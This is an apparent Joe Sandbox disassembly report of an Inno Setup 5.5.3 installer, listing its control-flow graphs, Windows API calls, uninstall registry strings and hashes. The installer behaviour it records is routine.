468915-468938 call 42a040 call 40b24c 2632->2686 2633->2632 2642 46880f-468813 2633->2642 2687 4687c4-4687c8 2639->2687 2640->2687 2653 468815-46882b call 40b24c 2642->2653 2682 46885e-468862 2653->2682 2683 46882d-468859 call 42a05c call 4699fc call 46989c 2653->2683 2654->2632 2655->2632 2660->2661 2673 468664-468676 call 406ac4 2660->2673 2661->2592 2661->2600 2671->2599 2672->2599 2672->2628 2673->2661 2696 468678-468682 2673->2696 2682->2653 2688 468864 2682->2688 2683->2632 2697 468974-468993 call 414a44 2685->2697 2711 468943-468952 call 414a44 2686->2711 2712 46893a-468941 2686->2712 2694 4687d3-4687d5 2687->2694 2695 4687ca-4687d1 2687->2695 2688->2632 2701 4687dc-4687e0 2694->2701 2695->2694 2695->2701 2696->2661 2702 468684 2696->2702 2713 468995-4689b8 call 42a040 call 469b5c 2697->2713 2714 4689bd-4689e0 call 47c26c call 403450 2697->2714 2701->2609 2701->2611 2702->2661 2711->2697 2712->2711 2717 468954-468963 call 414a44 2712->2717 2713->2714 2730 4689e2-4689eb 2714->2730 2731 4689fc-468a05 2714->2731 2717->2697 2730->2731 2732 4689ed-4689fa call 47c440 2730->2732 2733 468a07-468a19 call 403684 2731->2733 2734 468a1b-468a2b call 403494 2731->2734 2741 468a3d-468a54 call 414b18 2732->2741 2733->2734 2742 468a2d-468a38 call 403494 2733->2742 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2748 468a5f-468a68 2746->2748 2749 468a6a-468a74 call 42b0e4 2746->2749 2753 468a99-468abe call 403400 * 3 2747->2753 2748->2749 2751 468a79-468a88 call 414a44 2748->2751 2749->2751 2751->2753
                                                                                        APIs
                                                                                          • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                        • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                          • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                          • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                          • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                          • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                          • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                          • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                          • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                          • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                          • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                        • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212FBF4,02131954,?,?,02131984,?,?,021319D4,?), ref: 004683FD
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                          • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                        • String ID: $(Default)$STOPIMAGE$%H
                                                                                        • API String ID: 3231140908-2624782221
                                                                                        • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                        • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                        • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID: unins$unins???.*
                                                                                        • API String ID: 3541575487-1009660736
                                                                                        • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                        • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                        • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstanceVersion
                                                                                        • String ID: h{n
                                                                                        • API String ID: 1462612201-3745820648
                                                                                        • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                        • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                        • String ID:
                                                                                        • API String ID: 873889042-0
                                                                                        • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                        • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                        • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                        • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                        • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                        • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 847 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->847 848 46f095-46f09c 846->848 849 46f09e-46f0a5 846->849 856 46f101-46f12a call 403738 call 42dde4 847->856 857 46f0e8-46f0fc call 403738 call 42dec0 847->857 848->845 848->849 849->847 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1021 46f5be-46f5c5 1019->1021 1022 46f629-46f638 1019->1022 1023 46f687-46f6bd call 494cec 1020->1023 1024 46f6df-46f6f5 RegCloseKey 1020->1024 1021->1022 1026 46f5c7-46f5eb call 430bcc 1021->1026 1029 46f63b-46f648 1022->1029 1023->1024 1026->1029 1039 46f5ed-46f5ee 1026->1039 1030 46f65f-46f678 call 430c08 call 46eeb4 1029->1030 1031 46f64a-46f657 1029->1031 1042 46f67d 1030->1042 1031->1030 1035 46f659-46f65d 1031->1035 1035->1020 1035->1030 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1029
                                                                                        APIs
                                                                                          • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                          • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                        • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Close
                                                                                        • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                        • API String ID: 3391052094-3342197833
                                                                                        • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                        • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1081 4928c9 1062->1081 1079 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1079 1080 492960-49296d call 403684 1070->1080 1071->1060 1079->1060 1089 4929bc-4929c9 call 403684 1080->1089 1090 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1080->1090 1081->1060 1098 492a18-492a25 call 403684 1089->1098 1099 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1089->1099 1090->1060 1111 492a52-492a5f call 403684 1098->1111 1112 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1098->1112 1099->1060 1127 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1111->1127 1128 492aa0-492aad call 403684 1111->1128 1112->1060 1127->1060 1140 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1128->1140 1141 492af4-492b01 call 403684 1128->1141 1140->1060 1151 492b48-492b55 call 403684 1141->1151 1152 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1141->1152 1162 492baa-492bb7 call 403684 1151->1162 1163 492b57-492b75 call 446ff8 call 42e394 1151->1163 1152->1060 1174 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1162->1174 1175 492c31-492c3e call 403684 1162->1175 1183 492b87-492b95 GetLastError call 447278 1163->1183 1184 492b77-492b85 call 447278 1163->1184 1208 492c21-492c2c call 4470d0 1174->1208 1209 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1174->1209 1189 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1175->1189 1190 492c66-492c73 call 403684 1175->1190 1195 492b9a-492ba5 call 447278 1183->1195 1184->1195 1189->1060 1201 492c98-492ca5 call 403684 1190->1201 1202 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1190->1202 1195->1060 1217 492cdb-492ce8 call 403684 1201->1217 1218 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1201->1218 1202->1060 1208->1060 1209->1060 1227 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1217->1227 1228 492d1e 1217->1228 1218->1060 1227->1060 1228->1060
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                        • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSleepWindow
                                                                                        • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                        • API String ID: 3078808852-3310373309
                                                                                        • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                        • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1634 483ac8-483acc 1625->1634 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1632 483b29-483b46 1628->1632 1633 483b3d-483b44 1628->1633 1629->1630 1632->1630 1633->1630 1634->1624 1636 483ace-483ad5 call 45271c 1634->1636 1636->1624 1639 483ad7-483ae4 GetProcAddress 1636->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
